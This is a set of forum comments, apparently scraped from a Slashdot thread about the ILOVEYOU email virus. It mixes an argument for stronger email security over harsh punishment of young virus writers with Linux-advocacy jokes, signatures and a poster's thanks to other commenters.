A) A world where a rebellious teenager can cripple email systems worldwide because the security is so weak, and then we bring down the heavy hand of "justice" on this poor child because they "caused billions of dollars in damages," in the ridiculous hope of somehow disincenting teenage rebellion in the future; or
B) A world where a rebellious teenager cannot cripple email systems worldwide, and we don't have to impose excessive fines and cruel and unusual punishments on the child, and everyone's email keeps working fine.
I vote for B.
This is just one of the reasons I do not use MS anything to communicate with the world. I use Linux.
Linux - the ultimate virus protection program
make Linux, not Microsoft. sin(beast) = -0.809016994374947424102293417182819
...quite evidently _I'm_ not in ANYONE's Outlook address book....I haven't received the virus yet!!!
....Is there a problem, Dave? asked HAL....
Of course, this could mean an arrest in 24 hours.
*Carlos: Exit Stage Right*
"Geeks, Where would you be without them?"
*Carlos: Exit Stage Right*
"Geeks, Where would you be without them?"
"Got Linux?"
Take a look at it here.
You know what to do with the HELLO.
You know what to do with the HELLO. ...
Help create an open-source world
Yes, you're right, and so are the other 2 /.'ers who replied to my post.
:)
After I went to work and had to deal with the aftereffects of ILOVEYOU on my coworkers' computers, I found Slashdot to be a very useful resource. I was suprised nobody flamed me
So next time I'll be sure to have some tea before complaining about a story.
Thanks, and take care,
Mike